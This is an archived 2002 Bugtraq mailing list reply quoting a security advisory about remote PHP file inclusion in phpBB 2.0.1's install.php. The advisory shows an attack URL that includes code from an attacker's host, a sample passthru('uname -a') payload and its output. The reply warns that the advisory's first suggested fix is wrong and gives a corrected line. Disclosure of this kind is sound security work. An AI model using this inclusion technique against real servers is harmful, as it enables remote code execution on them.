Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: malicious PHP source injection in phpBB

From: Jonathan Haase <jlhaase () iland net>
Date: Mon, 17 Jun 2002 16:20:21 -0500
Note... The suggested fix for this in the php code below is very 
incorrect and will in fact leave install.php even more wide open 
than it currently is...

The correct fix to the php code should be to change the line on 
or about line 28 which reads...
include($phpbb_root_dir . 'includes/functions_selects.'.$phpEx);

to read more properly

include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);

Thanks,

Jonathan L. Haase


On Sunday 16 June 2002 8:29 am, morris Chang wrote:

JCC Security Advisory
June 16, 2002

malicious PHP source injection in phpBB

Description

phpBB is one of popular PHP bulletin board systems.
When allow_url_fopen = On and register_globals = On in
php.ini, phpBB has vulnerability because install.php contains
dangerous codes. So an attacker can include any files into
server's PHP codes.

Impact

It's tested on phpBB 2.0.1. but I think all of phpBB 2 is
affected.

Workaround

allow_url_fopen = off and register_globals = off.
and if complete install remove or rename install.php.
Or in install.php
-------install.php------------
define('IN_PHPBB', true);
$phpbb_root_path='./';
----------------------------
Put it
-------snip-----------------
$phpbb_root_dir='./';
----------------------------

Good idea to code that <<PHP_CODE
ini_set("register_globals", "Off");
ini_set ("allow_url_fopen", "Off");
PHP_CODE

Tested systems

phpBB 2.0.1 Debian GNU/Linux SID(x86)

Background

We checked the vulnerability with
"http://URL/install.php?phpbb_root_dir=WANTED_TO_INCLUDE"; and
made a sample code, functions_selects.php,

--------------------includes/functions_selects.php------------
-- <? passthru("uname -a"); ?>
-----------------------------------------

and type the following URL to invoke this sample code.

TEST URL :
http://URL/install.php?phpbb_root_dir=http://MYBOX/";

-------out put----------------------------
Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686
unknown Warning: Cannot add header information - headers
already sent by (output started at
http://210.117.152.118:6969/includes/functions_selects.php:1)
in /home/morris/public_html/tmp/phpBB2/includes/sessions.php
on line 182

Warning: Cannot add header information - headers already sent
by (output started at
http://210.117.152.118:6969/includes/functions_selects.php:1)
in /home/morris/public_html/tmp/phpBB2/includes/sessions.php
on line 183

Warning: Cannot add header information - headers already sent
by (output started at
http://210.117.152.118:6969/includes/functions_selects.php:1)
in /home/morris/public_html/tmp/phpBB2/install.php on line 346
-----------------------------------------

thx for BlackKnight at r0ar
---
http://jcc.hackerslab.org(at morris Chang)

e-mail : morris () xsdeny net
Previous By Date Next
Previous By Thread Next

Current thread: